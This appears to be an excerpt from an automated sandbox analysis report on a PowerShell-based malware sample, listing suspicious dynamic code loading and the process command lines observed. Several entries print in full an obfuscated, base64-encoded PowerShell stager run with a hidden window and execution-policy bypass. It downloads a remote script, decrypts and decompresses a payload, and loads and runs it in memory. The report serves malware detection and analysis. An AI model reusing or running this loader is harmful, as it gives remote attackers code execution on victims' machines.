                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Messages.cs.Net Code: Memory
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Messages.cs.Net Code: Memory
                Source: 5.2.powershell.exe.1d3130b0098.1.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 5.2.powershell.exe.1d31326fc88.4.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 5.2.powershell.exe.1d3130da550.6.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 5.2.powershell.exe.1d3130d3740.2.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, Messages.cs.Net Code: Memory
                Source: 11.2.powershell.exe.1d7ce1adde0.11.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 11.2.powershell.exe.1d7cdfeefc8.0.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, Messages.cs.Net Code: Memory
                Source: 11.2.powershell.exe.1d7ce012688.10.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, Messages.cs.Net Code: Memory
                Source: 11.2.powershell.exe.1d7ce019498.1.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Suspicious powershell command line found
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
